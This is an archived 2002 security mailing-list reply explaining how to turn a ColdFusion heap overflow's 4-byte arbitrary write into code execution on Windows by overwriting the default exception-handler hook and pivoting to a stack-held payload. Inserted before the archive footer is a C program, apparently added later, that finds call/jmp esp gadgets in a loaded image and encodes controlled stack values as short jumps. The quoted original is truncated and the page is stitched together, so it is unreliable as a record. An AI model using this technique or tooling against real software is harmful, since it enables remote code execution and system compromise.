
Re: ColdFusion Heap Overflow -continued

From: Riley Hassell <rhassell(at)eeye.com>
Date: Tue Dec 03 2002 - 03:26:43 EST

If you can move 4 bytes of choice to any location in your virtual environment, you can overwrite any stored 32-bit address. Loaded image data sections and loader environment data have reliable addresses due to the support of basing by the operating system and loader. If you want immediate execution, overwrite a hook address. Many API suites have hooks you can overwrite. The hook you choose depends on the situation of the vulnerability you are dealing with.

In this situation you may throw a fault after the following 'mov' instruction attempts to access a memory address of the data you supplied. If the 4 bytes you overwrote the data with do not signify a valid address, a fault will be issued. So use the fault-handling system in place. On win* this is structured exception handling.

When a fault is generated in a thread, an exception list is taken from the thread's TIB. This list is cycled twice and then the default exception handler is called. This default exception handler is in charge of generating a window so that the interface user can see the application had a fatal error. To allow the configurability of this default behavior, developers introduced a hook so that another developer in the future could create his or her own default handler.

This hook is loaded into an address that can be modified at runtime; it's also loaded in data with write privilege. Overwrite it with a relative address of a call or jmp that references a stack offset. This stack offset is where the address of your payload buffer will be. Keep in mind that if you can't find a sufficient byte sequence for your relative call, any data on the stack is seen as code to the processor during execution. Use any value you can control on the stack for your benefit. Every 32-bit function variable is an instruction up to 4 bytes in length if you can control it. Data sizes, IDs, indexes, port numbers....

Turn your stack into a big buffer of your code :)

-R

Riley Hassell
Security Research Associate
eEye Digital Security

----- Original Message -----
From: "Gary O'leary-Steele" <garyo@sec-1.com>
To: <pen-test@securityfocus.com>; <vuln-dev@securityfocus.com>
Sent: Friday, November 15, 2002 9:26 AM
Subject: ColdFusion Heap Overflow -continued

> Hi all,
> do)
> with mov [ecx],eax where ecx = 0x77f8e43b and eax =0x41414141 doesn't seem
Received on Sun Nov 17 14:15:15 2002
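The two techniques the reply above leans on, as an added C example that is not part of Riley Hassell's message or of any eEye tool: first, scanning a reliably based image for a call or jmp that dereferences a stack slot (the value you would write over the hook), and second, laying a controlled 32-bit value down so that the processor reads it as a short jump. The byte array standing in for the image, the image base 0x10000000 and the function names are assumptions made for this example; the scanner works on any byte buffer and runs on any platform, it is not a Windows exploit.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_GADGETS 16
#define IMAGE_BASE  0x10000000u   /* assumed base of the scanned image */

typedef struct {
    uint32_t va;        /* IMAGE_BASE + off: the dword you write over the hook */
    size_t   off;       /* offset inside the image */
    int      len;       /* encoded length in bytes */
    char     desc[24];  /* e.g. "call [esp+8]" */
} gadget_t;

/* Constructed sample bytes (not a real DLL): a prologue, filler, and a few
 * call/jmp encodings planted at known offsets. */
const uint8_t sample_image[] = {
    0x55, 0x8b, 0xec, 0x83, 0xec, 0x10,   /* push ebp; mov ebp,esp; sub esp,0x10 */
    0xff, 0x54, 0x24, 0x08,               /* off  6: call [esp+8]  */
    0x90, 0x90,
    0xff, 0xe4,                           /* off 12: jmp esp       */
    0xc3,
    0xff, 0x65, 0x0c,                     /* off 15: jmp [ebp+12]  */
    0x54, 0xc3,                           /* off 18: push esp; ret */
    0x31, 0xc0, 0xc3,
};

/* Decode one candidate at p. Recognised forms (opcode FF, ModRM reg=2 call, reg=4 jmp):
 *   FF D4 / FF E4              call/jmp esp            (mod=11, rm=100)
 *   FF D5 / FF E5              call/jmp ebp            (mod=11, rm=101)
 *   FF 54 24 ib / FF 64 24 ib  call/jmp [esp+disp8]    (mod=01, rm=100, SIB 24)
 *   FF 55 ib / FF 65 ib        call/jmp [ebp+disp8]    (mod=01, rm=101)
 *   54 C3                      push esp ; ret
 * Returns the encoded length, or 0 when p does not start such a sequence. */
static int decode_gadget(const uint8_t *p, size_t avail, char *desc, size_t dsz)
{
    if (avail >= 2 && p[0] == 0x54 && p[1] == 0xC3) {
        snprintf(desc, dsz, "push esp; ret");
        return 2;
    }
    if (avail < 2 || p[0] != 0xFF)
        return 0;
    uint8_t modrm = p[1];
    int mod = modrm >> 6, reg = (modrm >> 3) & 7, rm = modrm & 7;
    const char *op = reg == 2 ? "call" : reg == 4 ? "jmp" : NULL;
    if (!op)
        return 0;
    if (mod == 3 && (rm == 4 || rm == 5)) {                 /* register direct */
        snprintf(desc, dsz, "%s %s", op, rm == 4 ? "esp" : "ebp");
        return 2;
    }
    if (mod == 1 && rm == 5 && avail >= 3) {                /* [ebp+disp8] */
        snprintf(desc, dsz, "%s [ebp%+d]", op, (int)(int8_t)p[2]);
        return 3;
    }
    if (mod == 1 && rm == 4 && avail >= 4 && p[2] == 0x24) { /* [esp+disp8] via SIB */
        snprintf(desc, dsz, "%s [esp%+d]", op, (int)(int8_t)p[3]);
        return 4;
    }
    return 0;
}

/* Scan every byte offset, not just intended instruction starts: the bytes only
 * have to decode as a gadget from the address you jump to. */
size_t find_gadgets(const uint8_t *img, size_t len, uint32_t base,
                    gadget_t *out, size_t max)
{
    size_t n = 0;
    for (size_t off = 0; off < len && n < max; off++) {
        char desc[24];
        int glen = decode_gadget(img + off, len - off, desc, sizeof desc);
        if (!glen)
            continue;
        out[n].va  = base + (uint32_t)off;
        out[n].off = off;
        out[n].len = glen;
        memcpy(out[n].desc, desc, sizeof desc);
        n++;
    }
    return n;
}

/* A controlled 32-bit stack value (a length, an id, a port) that the processor
 * will read as "jmp short disp ; nop ; nop". Little-endian bytes EB disp 90 90
 * give the value 0x9090ddEB, so the dword itself becomes a 2-byte jump plus padding. */
uint32_t dword_jmp_short(int8_t disp)
{
    return 0x909000EBu | ((uint32_t)(uint8_t)disp << 8);
}

int main(void)
{
    gadget_t g[MAX_GADGETS];
    size_t n = find_gadgets(sample_image, sizeof sample_image, IMAGE_BASE, g, MAX_GADGETS);
    for (size_t i = 0; i < n; i++)
        printf("0x%08x  +%-3zu  %s\n", (unsigned)g[i].va, g[i].off, g[i].desc);
    printf("jmp short +0x10 as a controlled dword: 0x%08x\n", (unsigned)dword_jmp_short(0x10));
    return 0;
}
```

The va field is what goes into the 4-byte write: the hook then points at a `call [esp+disp]` or `jmp esp` whose operand resolves to the slot holding your buffer address. Against a real module you would scan the image's code and data sections at their actual load address instead of the constructed buffer.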

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT

